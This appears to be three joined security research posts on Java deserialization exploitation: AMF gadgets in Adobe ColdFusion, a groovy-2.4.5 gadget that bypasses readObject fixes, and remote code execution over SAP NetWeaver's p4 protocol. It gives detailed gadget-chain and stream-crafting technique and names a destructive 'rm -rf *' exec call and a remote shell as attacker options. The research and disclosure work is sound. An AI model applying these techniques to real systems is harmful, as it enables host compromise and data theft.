Serialization of Bean Properties (AMF0 and AMF3)
Serialization using Java's java.io.Externalizable interface. (AMF3)
Serialization of Bean Properties
This technique requires the object to be serialized to have a public no-arg constructor and, for every member, public getter and setter methods (JavaBeans convention).
In order to collect all member values of an object, the AMF serializer invokes all getter methods during serialization. The member names and values are put in the Action Message body along with the class name of the object.
During deserialization, the class name is taken from the Action Message, a new object is constructed, and for every member name the corresponding setter method is called with the value as argument. This all happens either in the method readScriptObject() of class flex.messaging.io.amf.Amf3Input or readObjectValue() of class flex.messaging.io.amf.Amf0Input.
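This getter/setter round trip can be approximated with the standard java.beans introspection API. BlazeDS uses its own property-descriptor machinery, so the following is only a behavioral sketch, and the Person bean is a made-up example rather than a ColdFusion class:

```java
import java.beans.IntrospectionException;
import java.beans.Introspector;
import java.beans.PropertyDescriptor;
import java.util.HashMap;
import java.util.Map;

public class BeanMarshalDemo {

    // "Serialization" side: invoke every public getter, record name/value pairs
    public static Map<String, Object> readProperties(Object bean) {
        try {
            Map<String, Object> props = new HashMap<>();
            for (PropertyDescriptor pd : Introspector
                    .getBeanInfo(bean.getClass(), Object.class).getPropertyDescriptors()) {
                if (pd.getReadMethod() != null) {
                    props.put(pd.getName(), pd.getReadMethod().invoke(bean));
                }
            }
            return props;
        } catch (ReflectiveOperationException | IntrospectionException e) {
            throw new RuntimeException(e);
        }
    }

    // "Deserialization" side: no-arg constructor first, then one setter call per member
    public static <T> T writeProperties(Class<T> type, Map<String, Object> props) {
        try {
            T bean = type.getDeclaredConstructor().newInstance();
            for (PropertyDescriptor pd : Introspector
                    .getBeanInfo(type, Object.class).getPropertyDescriptors()) {
                if (pd.getWriteMethod() != null && props.containsKey(pd.getName())) {
                    pd.getWriteMethod().invoke(bean, props.get(pd.getName()));
                }
            }
            return bean;
        } catch (ReflectiveOperationException | IntrospectionException e) {
            throw new RuntimeException(e);
        }
    }

    // Hypothetical example bean following the JavaBeans convention
    public static class Person {
        private String name;
        public String getName() { return name; }
        public void setName(String name) { this.name = name; }
    }
}
```

The security-relevant point is visible in writeProperties(): the deserializer calls attacker-chosen setters on any class it is told to instantiate.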
Serialization using Java's java.io.Externalizable interface
BlazeDS further supports serialization of complex objects of classes implementing
the java.io.Externalizable interface which inherits from java.io.Serializable.
Every class implementing this interface needs to provide its own logic to deserialize itself by calling methods on the java.io.ObjectInput implementation to read serialized primitive types and Strings (e.g. the method read(byte[] paramArrayOfByte)).
During deserialization of an object (type 0xa) in AMF3, the method readScriptObject()
of class flex.messaging.io.amf.Amf3Input gets called.
In line #759 the method readExternalizable is invoked which
calls the readExternal() method on the object to be deserialized.
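A minimal Externalizable class might look like the following sketch; the point is that readExternal() is plain code chosen by the class author, which runs with attacker-controlled stream data during deserialization. The class name and helper are made up for illustration:

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.Externalizable;
import java.io.IOException;
import java.io.ObjectInput;
import java.io.ObjectInputStream;
import java.io.ObjectOutput;
import java.io.ObjectOutputStream;

public class ExternalizableDemo implements Externalizable {
    private String value;

    public ExternalizableDemo() { }                 // public no-arg constructor is required
    public ExternalizableDemo(String value) { this.value = value; }

    public String getValue() { return value; }

    @Override
    public void writeExternal(ObjectOutput out) throws IOException {
        out.writeUTF(value);
    }

    @Override
    public void readExternal(ObjectInput in) throws IOException {
        // Arbitrary logic chosen by the class author runs here during deserialization
        this.value = in.readUTF();
    }

    // Helper: serialize and deserialize with standard Java serialization
    public static ExternalizableDemo roundTrip(ExternalizableDemo obj) {
        try {
            ByteArrayOutputStream bos = new ByteArrayOutputStream();
            new ObjectOutputStream(bos).writeObject(obj);
            return (ExternalizableDemo) new ObjectInputStream(
                    new ByteArrayInputStream(bos.toByteArray())).readObject();
        } catch (IOException | ClassNotFoundException e) {
            throw new RuntimeException(e);
        }
    }
}
```

This is the same mechanism AMF3 taps into: any Externalizable class on the classpath can be named in the stream, and its readExternal() is handed the attacker's bytes.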
This should be sufficient to serve as an introduction to Adobe ColdFusion and AMF.
Previous work
Chris Gates (@Carnal0wnage) published the paper ColdFusion for Pentesters which is an excellent introduction to Adobe ColdFusion.
Wouter Coekaerts (@WouterCoekaerts) already showed in his blog post that deserializing untrusted AMF data is dangerous.
Looking at the history of Adobe ColdFusion vulnerabilities at Flexera/Secunia's database you can find mostly XSS', XXE's and information disclosures.
The most recent ones are:
Deserialization of untrusted data over RMI (CVE-2017-11283/4 by @nickstadb)
XXE (CVE-2017-11286 by Daniel Lawson of @depthsecurity)
XXE (CVE-2016-4264 by @dawid_golunski)
CVE-2017-3066
In 2017 Moritz Bechler of AgNO3 GmbH and my teammate Markus Wulftange discovered
independently the vulnerability CVE-2017-3066 in Apache BlazeDS.
The core problem of this vulnerability was that Adobe ColdFusion never did any
whitelisting of allowed classes.
Thus any class in the classpath of Adobe ColdFusion, which either fulfills the
Java Beans Convention or implements java.io.Externalizable could be sent to the server
and get deserialized.
Both Moritz and Markus found JRE classes (sun.rmi.server.UnicastRef2 and sun.rmi.server.UnicastRef) which implemented the java.io.Externalizable interface
and triggered an outgoing TCP connection during AMF3 deserialization.
After the connection was made to the attacker's server, its response was deserialized
using Java's native deserialization using
ObjectInputStream.readObject(). Both found a great "bridge" from AMF
deserialization to Java's native deserialization which offers well known
exploitation primitives using public gadgets.
Details about the vulnerability can also be found in Markus' blog post.
Apache introduced validation through the class
flex.messaging.validators.ClassDeserializationValidator.
It has a default whitelist but can also be configured with a configuration file.
For details see the Apache BlazeDS release notes.
Finding exploitation primitives before CVE-2017-3066
As already mentioned in the very beginning my teammate Thomas required an exploit
which also works without outgoing connection.
I had a quick look into the excellent research paper "Java Unmarshaller Security" of Moritz Bechler where he analysed several "Unmarshallers" including BlazeDS.
The exploitation payloads he discovered weren't applicable since the libraries
were missing in the classpath.
So I started with my typical approach, fired up my favorite "reverse engineering tool" when it comes to Java, Eclipse.
Eclipse together with the powerful decompiler plugin
"JD-Eclipse" (https://github.com/java-decompiler/jd-eclipse) is all you need for
static and dynamic analysis.
As a former dev I was used to working with IDEs which make your life easier,
and decompiling and grepping through code is often very inefficient and error-prone.
So I created a new Java project and added all jar files of Adobe ColdFusion 12
as external libraries.
The first idea was to look for further calls to Java's ObjectInputStream.readObject() method. Using Eclipse this is very easy.
Just open class ObjectInputStream, right click on the readObject() method and
click "Open Call Hierarchy". Thanks to JD-Eclipse and its decompiler, Eclipse is
able to construct call graphs based on class information without having any source.
The call graph looks big in the very beginning. But with some experience you
see very quickly which nodes in the graph are interesting.
After some hours I found two promising call graphs.
Setter-based Exploit
The first one starts with method setState(byte[] new_state) of class
org.jgroups.blocks.ReplicatedTree.
Looking at the implementation of this method, we can already imagine what is happening in line #605.
A quick look at the call graph confirms that we eventually end up in a call to ObjectInputStream.readObject().
The only thing to mention here is that the byte[] passed to setState()
needs to have an additional byte 0x2 at offset 0x0 as we can see from line 364
of class org.jgroups.util.Util.
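To illustrate the framing, here is a hedged sketch (the helper name is illustrative, and a harmless String stands in for what would really be a serialized ysoserial gadget):

```java
import java.io.*;

public class StatePayload {

    // Illustrative helper: prepends the 0x2 marker byte that
    // org.jgroups.util.Util expects at offset 0x0, so that the rest of
    // the buffer is treated as a serialized Java object by setState().
    public static byte[] wrap(byte[] serializedGadget) {
        byte[] out = new byte[serializedGadget.length + 1];
        out[0] = 0x2; // marker byte at offset 0x0
        System.arraycopy(serializedGadget, 0, out, 1, serializedGadget.length);
        return out;
    }

    public static void main(String[] args) throws Exception {
        // For this sketch we serialize a harmless String instead of a gadget.
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(bos);
        oos.writeObject("harmless");
        oos.flush();
        byte[] payload = wrap(bos.toByteArray());
        System.out.println(payload[0]); // the marker byte
    }
}
```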
The exploit can be found in the following image.
The exploit works against Adobe ColdFusion 12 only since JGroups is only
available in this specific version.
Externalizable-based Exploit
The second call graph starts in class org.apache.axis2.util.MetaDataEntry
with a call to readExternal which is what we are looking for.
In line #297 we have a call to SafeObjectInputStream.install(inObject).
In this function our AMF3Input instance gets wrapped by a
org.apache.axis2.context.externalize.SafeObjectInputStream
instance.
In line #341 a new instance of class
org.apache.axis2.context.externalize.ObjectInputStreamWithCL is created.
This class just extends the standard java.io.ObjectInputStream.
In line #342 we finally have our call to readObject().
The following image shows the request for the exploit.
The exploit works against Adobe ColdFusion 11 and 12.
ColdFusionPwn
To make your life easier, I created the simple tool ColdFusionPwn. It works on the command line and allows you to generate the serialized AMF message. It incorporates Chris Frohoff's ysoserial for gadget generation and can be found on our GitHub.
Takeaways
Deserializing untrusted input is bad, that's for sure.
From an exploiter's perspective, exploiting deserialization vulnerabilities is
a challenging task since you need to find the "right" objects (gadgets) that trigger
functionality you can reuse for exploitation. But it's also more fun :-)
By the way: If you want to take a deep dive into server-side Java exploitation, all sorts of deserialization
vulnerabilities, and how to do proper static and dynamic analysis in Java,
you might be interested in our upcoming "Advanced Java Exploitation" course.
In Q4 2017 I was pentesting a customer. Shortly before, I had studied JSON attacks when I stumbled over an internet-facing B2B-portal-type-of-product written in Java they were using (I cannot disclose more details due to responsible disclosure). After a while, I found that one of the server responses sent a serialized Java object, so I downloaded the source code and found a way to make the server deserialize untrusted input. Unfortunately, there was no appropriate gadget available. However, they were using groovy-2.4.5, so when I saw [1] at the end of December on Twitter, I knew I could pwn the target if I succeeded in writing a gadget for groovy-2.4.5. This led to this blog post, which is based on work by Sam Thomas [2], Wouter Coekaerts [3] and Alvaro Muñoz (pwntester) [4].
Be careful when you fix your readObject() implementation...
We'll start by exploring a popular mistake some developers made during the first mitigation attempts, after the first custom gadgets surfaced following the initial discovery of a vulnerability. Let's check out an example, the Jdk7u21 gadget. A brief recap of what it does: it makes use of a hashcode collision that occurs when a specially crafted instance of java.util.LinkedHashSet is deserialized (you need a string with hashcode 0 for this). It uses a java.lang.reflect.Proxy to create a proxied instance of the interface javax.xml.transform.Templates, with sun.reflect.annotation.AnnotationInvocationHandler as InvocationHandler. Ultimately, in an attempt to determine the equality of the two provided objects, the invocation handler calls all argument-less methods of the provided TemplatesImpl class, which yields code execution through the malicious byte code inside the TemplatesImpl instance. For further details, check out what the methods AnnotationInvocationHandler.equalsImpl() and TemplatesImpl.newTransletInstance() do (and check out the links related to this gadget).
The following diagram, taken from [5], depicts a graphical overview of the architecture of the gadget.
So far, so well known.
In recent Java runtimes, there are in total 3 fixes inside AnnotationInvocationHandler which break this gadget (see epilogue). But let's start with the first and most obvious bug. The code below is from AnnotationInvocationHandler in Java version 1.7.0_21:
There is a try/catch around an attempt to get the proxied annotation type. But the proxied interface javax.xml.transform.Templates is not an annotation. This constitutes a clear case of potentially dangerous input that would need to be dealt with. However, instead of throwing an exception, there is only a return statement inside the catch-branch. Fortunately for the attacker, the instance of the class is already fit for purpose at that point and does not need the rest of the readObject() method in order to do its malicious work. So the "return" is problematic and would have to be replaced by throwing an exception of some sort.
Let's check what this method looks like in Java runtime 1.7.0_80:
Ok, so problem fixed? Well, yes and no. On the one hand, the use of the exception in the catch-clause will break the gadget which currently ships with ysoserial. On the other hand, this fix is a perfect example of the popular mistake I'm talking about. Wouter Coekaerts (see [3]) came up with an idea how to bypass such "fixes" and Alvaro Muñoz (see [4]) provided a gadget for JRE8u20 which utilizes this technique (in case you're wondering why there is no gadget for jdk1.7.0_80: 2 out of the total 3 fixes mentioned above are already incorporated into this version of the class. Even though it is possible to bypass fix number one, fix number two would definitely stop the attack).
Let's check out how this bypass works in detail.
A little theory
Let's recap what the Java (De-)Serialization does and what the readObject() method is good for. Let's take the example of java.util.HashMap. An instance of it contains data (key/value pairs) and structural information (something derived from the data) that allows logarithmic access times to your data. When serializing an instance of java.util.HashMap it would not be wise to fully serialize its internal representation. Instead it is completely sufficient to only serialize the data that is required to reconstruct its original state: Metadata (loadfactor, size, ...) followed by the key/value pairs as flat list. Let's have a look at the code:
As you can see, the method starts with a call to defaultReadObject. After that, the instance attributes loadFactor and threshold are initialized and can be used. The key/value pairs are located at the end of the serialized stream. Since the key/value pairs are contained in the stream as an unstructured flat list, calling putVal(key, value) restores the internal structure, which allows them to be used efficiently later on.
In general, it is fair to assume that many readObject() methods look like this:
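A minimal, self-contained sketch of this pattern (class and field names are illustrative, not from the JDK): defaultReadObject() restores the metadata first, then custom code validates the input and rebuilds the derived structure.

```java
import java.io.*;
import java.util.*;

public class FlatSet implements Serializable {
    private int size;                     // metadata, default-serialized
    private transient List<Object> items; // derived structure, rebuilt on read

    public FlatSet(Object... values) {
        items = new ArrayList<>(Arrays.asList(values));
        size = items.size();
    }

    private void writeObject(ObjectOutputStream out) throws IOException {
        out.defaultWriteObject();              // 1. metadata first
        for (Object o : items) {
            out.writeObject(o);                // 2. the data as a flat list
        }
    }

    private void readObject(ObjectInputStream in)
            throws IOException, ClassNotFoundException {
        in.defaultReadObject();                // 1. restore default fields
        if (size < 0) {                        // 2. custom code: validate...
            throw new InvalidObjectException("illegal size: " + size);
        }
        items = new ArrayList<>(size);         // ...and rebuild the structure
        for (int i = 0; i < size; i++) {
            items.add(in.readObject());
        }
    }

    public static void main(String[] args) throws Exception {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(bos);
        oos.writeObject(new FlatSet("a", "b"));
        oos.flush();
        FlatSet copy = (FlatSet) new ObjectInputStream(
                new ByteArrayInputStream(bos.toByteArray())).readObject();
        System.out.println(copy.items);
    }
}
```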
Coming back to AnnotationInvocationHandler, we can see that its method readObject follows this pattern. Since the problem was located in the custom code section of the method, the fix was also applied there. In both versions, ObjectInputStream.defaultReadObject() is the first instruction. Now let's discuss why this is a problem and how the bypass works.
Handcrafted Gadgets
At work we frequently use ysoserial gadgets. I suppose many readers are familiar with the ysoserial payloads and how they are created: a lot of Java reflection, a couple of fancy helper classes doing stuff like setting fields and creating Proxy and Constructor instances. By "handcrafted gadgets" I mean gadgets of a different kind: gadgets which cannot be created in the fashion ysoserial does it (which is: create an instance of a Java object and serialize it). The gadgets I'm talking about are created by compiling a serialization stream manually, token by token. The result is something that can be deserialized but does not represent a legal Java class instance. If you would like to see an example, check out Alvaro's JRE8u20 gadget [4]. But let me not get ahead of myself; let's take a step back and focus on the problem I mentioned at the end of the last paragraph: if the developer does not take care when fixing the readObject method, there might be a way to bypass that fix. The JRE8u20 gadget is an example of such a bypass. The original idea was, as already mentioned in the introduction, first described by Wouter Coekaerts [3]. It can be summarized as follows:
Idea
The fundamental insight is the fact that many classes are at least partly functional once the default attributes have been instantiated and populated by the ObjectInputStream.defaultReadObject() method call. This is the case for AnnotationInvocationHandler (in older Java versions; more recent versions don't call this method anymore). The attacker does not need readObject to terminate successfully; an object instance where ObjectInputStream.defaultReadObject() has executed is perfectly okay. However, it is definitely not okay from an attacker's perspective if readObject throws an exception, since eventually this will break deserialization of the gadget completely. The second very important detail is the fact that if it is possible to somehow suppress the InvalidObjectException (to stick with the AnnotationInvocationHandler example), then it is possible to access the instance of AnnotationInvocationHandler later through references. During the deserialization process, ObjectInputStream keeps a cache of various sorts of objects. When AnnotationInvocationHandler.readObject is called, an instance of the object is available in that cache.
This brings the number of necessary steps to write the gadget down to two. Firstly, store the AnnotationInvocationHandler in the cache by somehow wrapping it such that the exception is suppressed. Secondly, build the original gadget, but replace the AnnotationInvocationHandler in it by a reference to the object located in the cache.
Now let's step through the detailed technical explanation.
If one thinks about object serialization and the fact that you can nest objects recursively it is clear that something like references must exist. Think about the following construct:
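A minimal stand-in might look like this (class and field names are illustrative): an instance c whose attribute a points to an object that was already written to the stream earlier, forcing the stream to encode a back-reference instead of a second copy.

```java
import java.io.*;

public class RefDemo {
    static class A implements Serializable {}
    static class C implements Serializable { A a; }

    public static void main(String[] args) throws Exception {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(bos);

        A shared = new A();
        oos.writeObject(shared);   // the A instance is serialized here first
        C c = new C();
        c.a = shared;              // c.a points to the already-serialized instance
        oos.writeObject(c);        // the stream encodes c.a as a back-reference
        oos.flush();

        // Count TC_REFERENCE markers (0x71, i.e. "q") in the raw stream;
        // at least one must be present for c.a.
        int refs = 0;
        for (byte x : bos.toByteArray()) if (x == 0x71) refs++;
        System.out.println(refs >= 1);
    }
}
```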
Here, the attribute a of class instance c points to an existing instance already serialized before and the serialized stream must reflect this somehow. When you look at a serialized binary stream you can immediately see the references: The hex representation usually looks like this:
71 00 7E AB CD
where AB CD is a short value which represents the array index of the referenced object in the cache. You can easily spot references in the byte stream since hex 71 is "q" and hex 7E is "~":
Wouter Coekaerts found the class java.beans.beancontext.BeanContextSupport. At some point during deserialization it does the following:
Execution simply continues in the catch-branch, which is exactly what we need. So if we can build a serialized stream with an AnnotationInvocationHandler as the first child of a BeanContextSupport instance, we will end up in the catch (IOException ioe) branch during deserialization and deserialization will continue.
Let's test this out. I will build a serialized stream with an illegal AnnotationInvocationHandler in it ("illegal" means that the type attribute is not an annotation) and we will see that the stream deserializes properly without throwing an exception. Here is what the structure of this stream will look like:
Once done, the deserialized object is a HashMap with one key/value pair, key is an instance of BeanContextSupport, value is "whatever".
Click here to see the code on github.com
You need to build Alvaro's project [6] to get the jar file necessary for building this:
kai@CodeVM:~/eworkspace/deser$ javac -cp /home/kai/JRE8u20_RCE_Gadget/target/JRE8Exploit-1.0-SNAPSHOT.jar BCSSerializationTest.java
kai@CodeVM:~/eworkspace/deser$ java -cp .:/home/kai/JRE8u20_RCE_Gadget/target/JRE8Exploit-1.0-SNAPSHOT.jar BCSSerializationTest > 4blogpost
Writing java.lang.Class at offset 1048
Done writing java.lang.Class at offset 1094
Writing java.util.HashMap at offset 1094
Done writing java.util.HashMap at offset 1172
Adjusting reference from: 6 to: 8
Adjusting reference from: 6 to: 8
Adjusting reference from: 8 to: 10
Adjusting reference from: 9 to: 11
Adjusting reference from: 6 to: 8
Adjusting reference from: 14 to: 16
Adjusting reference from: 14 to: 16
Adjusting reference from: 14 to: 16
Adjusting reference from: 14 to: 16
Adjusting reference from: 17 to: 19
Adjusting reference from: 17 to: 19
kai@CodeVM:~/eworkspace/deser$
A little program that deserializes the created file and prints out the resulting object shows us this:
This concludes the first part, we successfully wrapped an instance of AnnotationInvocationHandler inside another class such that deserialization completes successfully.
Now we need to make that instance accessible. First we need to get hold of the cache. In order to do this, we need to debug. We set a breakpoint at the highlighted line in java.util.HashMap:
Then start the deserializer program and step into readObject:
When we open it we can see that number 24 is what we were looking for.
Here is one more interesting thing: if you deserialize with an older patch level of the Java Runtime, the object is initialized, as can be seen in the screenshot below:
If you use a more recent patch level like Java 1.7.0_151, you will see that the attributes memberValues and type are null. This is the effect of the third improvement to the class I mentioned before. More recent versions don't call defaultReadObject at all anymore. Instead, they first check whether type is an annotation type, and only after that do they populate the default fields.
Let's do one more little exercise. In the program above in line 150, change
As you can see, the entry in the handles table can easily be referenced.
Now we'll leave the Jdk7u21 gadget and AnnotationInvocationHandler and build a gadget for groovy 2.4.5 using the techniques outlined above.
A deserialization gadget for groovy-2.4.5
Based on an idea of Sam Thomas (see [2]).
The original gadget for version 2.3.9 looks like this:
The trigger is the readObject of our beloved AnnotationInvocationHandler; it will call entrySet of the memberValues hash map, which is a proxy with an invocation handler of type org.codehaus.groovy.runtime.ConvertedClosure. Every invocation on the ConvertedClosure is then delegated to doCall of the nested MethodClosure instance, which is a wrapper for the call to the Groovy function execute. The OS command that will be executed is provided as a member attribute of MethodClosure.
After the original gadget for version 2.3.9 showed up, MethodClosure was fixed by adding a readResolve method to the class org.codehaus.groovy.runtime.MethodClosure:
If the global constant ALLOW_RESOLVE is not set to true, an UnsupportedOperationException is supposed to break the deserialization. Basically, this means that an instance of MethodClosure cannot be deserialized anymore unless one explicitly enables it.
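The guard can be sketched as follows, using a hypothetical stand-in class instead of Groovy's MethodClosure (paraphrased, not copied from Groovy's sources):

```java
import java.io.*;

public class GuardedClosure implements Serializable {
    // Stand-in for Groovy's ALLOW_RESOLVE flag: deserialization is
    // disabled unless explicitly enabled.
    public static boolean ALLOW_RESOLVE = false;

    // readResolve is invoked after the default built-in deserialization.
    private Object readResolve() {
        if (!ALLOW_RESOLVE) {
            throw new UnsupportedOperationException("deserialization disabled");
        }
        return this;
    }

    public static void main(String[] args) throws Exception {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(bos);
        oos.writeObject(new GuardedClosure());
        oos.flush();
        try {
            new ObjectInputStream(
                    new ByteArrayInputStream(bos.toByteArray())).readObject();
        } catch (UnsupportedOperationException e) {
            // the RuntimeException from readResolve breaks deserialization
            System.out.println("blocked: " + e.getMessage());
        }
    }
}
```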
Let's quickly analyze MethodClosure: the class does not have a readObject method, and readResolve is called after the default built-in deserialization. So when readResolve throws the exception, the situation is almost identical to the one explained in the paragraphs above: an instance of MethodClosure is already in the handle table. But there is one important difference: AnnotationInvocationHandler throws an InvalidObjectException, which is a child of IOException, whereas readResolve throws an UnsupportedOperationException, which is a child of RuntimeException. BeanContextSupport, however, only catches IOException and ClassCastException. So the identical approach as outlined above would not work: the exception would not be caught. Fortunately, in late 2016 Sam Thomas found the class sun.security.krb5.KRBError, which in its readObject method transforms every type of exception into IOException:
This means if we put KRBError in between BeanContextSupport and MethodClosure the UnsupportedOperationException will be translated into IOException which is ultimately caught inside the readChildren method of BeanContextSupport.
So our wrapper construct looks like this:
Some readers might be confused by the fact that you can nest an object of type MethodClosure inside a KRBError. Looking at the code and interface of the latter, there is no indication that this is possible. But it is important to keep in mind that we are not dealing with Java objects here! We are dealing with a byte stream that is deserialized. If you look again at the readObject method of KRBError, you can see that this class calls ObjectInputStream.readObject() right away. So here, every serialized Java object will do fine. Only the cast to byte array would throw a ClassCastException, but remember: an exception will already have been thrown before that, and this is perfectly fine with the design of our exploit.
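The principle can be demonstrated with plain stand-in classes (illustrative names, not the real KRBError or MethodClosure): Outer.readObject() calls in.readObject() first and casts afterwards, so any serialized object can be embedded; if that object's deserialization throws, the cast is never even reached, and the RuntimeException is translated into an IOException.

```java
import java.io.*;

public class NestAnything {
    // Stand-in for MethodClosure: throws a RuntimeException on read.
    static class Thrower implements Serializable {
        private void readObject(ObjectInputStream in) throws IOException {
            throw new UnsupportedOperationException("boom");
        }
    }

    // Stand-in for KRBError: reads a nested object, casts only afterwards,
    // and wraps any RuntimeException into an IOException.
    static class Outer implements Serializable {
        transient byte[] data;
        private void writeObject(ObjectOutputStream out) throws IOException {
            out.defaultWriteObject();
            out.writeObject(new Thrower());      // nested "foreign" object
        }
        private void readObject(ObjectInputStream in)
                throws IOException, ClassNotFoundException {
            in.defaultReadObject();
            try {
                data = (byte[]) in.readObject(); // cast happens after readObject()
            } catch (RuntimeException e) {
                throw new IOException(e);        // translated, like in KRBError
            }
        }
    }

    public static void main(String[] args) throws Exception {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(bos);
        oos.writeObject(new Outer());
        oos.flush();
        try {
            new ObjectInputStream(
                    new ByteArrayInputStream(bos.toByteArray())).readObject();
        } catch (IOException e) {
            System.out.println("IOException as expected");
        }
    }
}
```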
Now it is time to put the pieces together. The complete exploit consists of a hash map with one key/value pair: the BeanContextSupport is the key, the groovy gadget is the value. [1] suggests putting the BeanContextSupport inside the AnnotationInvocationHandler, but using the hash map has certain advantages for debugging. The final structure looks like this:
The final exploit can be found on github.com.
I had mentioned 3 improvements in AnnotationInvocationHandler but only provided one code snippet. For the sake of completeness, here are the other two:
The second fix in jdk1.7.0_80 which already breaks the jdk gadget is a check in equalsImpl:
The highlighted check filters out the methods getOutputProperties and newTransformer of TemplatesImpl because they are not considered annotation methods; getMemberMethods returns an empty array, so the methods of TemplatesImpl are never called and nothing happens.
The third fix which you can find for example in version 1.7.0_151 finally fixes readObject:
As one can see, only the last two calls actually set the member attributes type and memberValues. defaultReadObject is not used at all. Before that, the type check for the annotation class is performed. If it fails, an InvalidObjectException is thrown and type and memberValues remain null.
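The hardened pattern can be sketched with a stand-in class (paraphrased rather than copied from the JDK): read the fields via readFields() without assigning them, validate first, and only then populate the members.

```java
import java.io.*;
import java.util.HashMap;
import java.util.Map;

public class HardenedHandler implements Serializable {
    private Class<?> type;
    private Map<String, Object> memberValues;

    HardenedHandler(Class<?> type, Map<String, Object> mv) {
        this.type = type;
        this.memberValues = mv;
    }

    private void readObject(ObjectInputStream s)
            throws IOException, ClassNotFoundException {
        // No defaultReadObject(): fields are read but NOT yet assigned.
        ObjectInputStream.GetField f = s.readFields();
        Class<?> t = (Class<?>) f.get("type", null);
        @SuppressWarnings("unchecked")
        Map<String, Object> mv = (Map<String, Object>) f.get("memberValues", null);
        if (t == null || !t.isAnnotation()) {
            throw new InvalidObjectException("Non-annotation type in stream");
        }
        this.type = t;             // members are set only after the check
        this.memberValues = mv;
    }

    public static void main(String[] args) throws Exception {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(bos);
        // String.class is not an annotation, so deserialization must fail.
        oos.writeObject(new HardenedHandler(String.class, new HashMap<>()));
        oos.flush();
        try {
            new ObjectInputStream(
                    new ByteArrayInputStream(bos.toByteArray())).readObject();
        } catch (InvalidObjectException e) {
            System.out.println(e.getMessage());
        }
    }
}
```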
Code White already has an impressive publication record on Java deserialization. This post is dedicated to a vulnerability in SAP NetWeaver Java. We could achieve remote code execution through the p4 protocol and the Jdk7u21 gadget with certain engines and certain versions of the SAP JVM.
We would like to emphasize the big threat unauthenticated RCE poses to an SAP NetWeaver Java installation. An attacker with a remote shell can read out the secure storage, access the database, create a local NetWeaver user with administrative privileges, in other words, fully compromise the host. Unfortunately, this list is far from complete. An SAP landscape is usually a network of tightly
connected servers and services. It wouldn't be unusual for the server's database to store technical users with high privileges for other SAP systems, be it NetWeaver ABAP or others. Once the attacker gets hold of credentials for those users, she can extend her foothold in the organization and eventually compromise the entire SAP landscape.
We tested our exploit successfully on 7.20, 7.30 and 7.40 machines; for detailed version numbers see below. When contacted, SAP Product Security Response told us they had published three notes (see [7], [8] and [9]) about updates fixing the problems (already in June 2013) with SAP JVM versions 1.5.0_086, 1.6.0_052 and 1.7.0_009 (we tested on earlier versions, see below). In addition, SAP has recently adopted JDK JEP 290 (a Java enhancement that allows filtering of incoming serialized data). However, these three notes neither mention Java deserialization nor make it obvious to the reader that they relate to security in any other way.
Due to missing access to the SAP Service Marketplace, we're unable to make any statement about the aforementioned SAP JVM versions. We could only analyze the latest SAP JVM available from tools.hana.ondemand.com (see [6]), which contained a fix for the problem.
Details
In his Infiltrate '16 and RuhrSec '16 talks, Code White's former employee Matthias Kaiser already talked about SAP NetWeaver Java being vulnerable [2]. The work described here is completely independent of his research.
The natural entry point in this area is the p4 protocol. We found a p4 test client on SAP Collaboration Network and sniffed the traffic. One doesn’t need to wait long until a serialized object is sent over the wire:
00000000  76 31                                            v1
00000002  18 23 70 23 34 4e 6f 6e 65 3a 31 32 37 2e 30 2e  .#p#4Non e:127.0.
00000012  31 2e 31 3a 35 39 32 35 36                       1.1:5925 6
00000000  76 31 19 23 70 23 34 4e 6f 6e 65 3a 31 30 2e 30  v1.#p#4N one:10.0
00000010  2e 31 2e 31 38 34 3a 35 30 30 30 34              .1.184:5 0004
The highlighted part is just the java.lang.String object “ClientIDPropagator”.
Now our plan was to replace this serialized object by a ysoserial payload. Therefore, we needed to
find out how the length of such a message block is encoded.
When we look at offset 0000005E, for instance, the 00 00 75 00 looks like 2 header null bytes
followed by a length in little endian format. Hex 75 is 117, but the total length of the last
block is 8*16+3 = 131. If one looks at the blocks the client sent before (at offsets 0000001B
and 0000003A), one can easily spot that the real length of a block is always 14 more than the
length value sent. This led to the first conclusion: a message block consists of 2 null bytes,
2 bytes payload length in little endian format, then 10 bytes of (not yet understood) header
information, then the payload:
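As a hedged sketch, the framing we reverse-engineered can be expressed like this (the header contents are placeholders, since their semantics were not fully understood):

```java
import java.io.*;

public class P4Frame {

    // Frame a payload according to the observed p4 layout: 2 null bytes,
    // payload length as a 16-bit little-endian value, 10 header bytes
    // (placeholders here), then the payload itself.
    public static byte[] frame(byte[] header10, byte[] payload) throws IOException {
        if (header10.length != 10) {
            throw new IllegalArgumentException("header must be 10 bytes");
        }
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        out.write(0x00);                          // two null bytes
        out.write(0x00);
        out.write(payload.length & 0xFF);         // length, little endian
        out.write((payload.length >> 8) & 0xFF);
        out.write(header10);                      // 10 header bytes
        out.write(payload);                       // the payload
        return out.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        byte[] payload = new byte[117];           // 0x75 bytes of payload
        byte[] block = frame(new byte[10], payload);
        System.out.println(block.length);         // 117 + 14 framing bytes
        System.out.println(Integer.toHexString(block[2] & 0xFF));
    }
}
```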
When running the test client several times and examining the messages carefully enough, one can see that the payload and header aren't static: they use two 4-byte words sent in the second reply from
the server:
That was enough to set up a first small Python program: send the corresponding byte arrays in the right order, read the replies from the network, set the 4-byte words accordingly, and replace "ClientIDPropagator" by the ysoserial Jdk7u21 gadget.
Unfortunately, this didn’t work out at first. A bit later we realized that SAP NetWeaver Java obviously didn’t serialize with the plain vanilla Java ObjectOutputStream but with a custom serializer. After twisting and tweaking a bit we were finally successful. Details are left to the reader ;-)
To demonstrate how dangerous this is, we have published a disarmed exploit on GitHub [5]. Instead of using a payload that writes a simple file to the current directory (e.g. cw98653.txt with contents "VULNERABLE"), like we did, an attacker can also add bytecode that runs Runtime.getRuntime().exec("rm -rf *") or establishes a remote shell on the system, thereby compromising the host or, in the worst case, even parts of the SAP landscape.
We could successfully verify this exploit on the following systems:
SAP Application Server Java 7.20 with SAPJVM 1.6.0_07 (build 007)
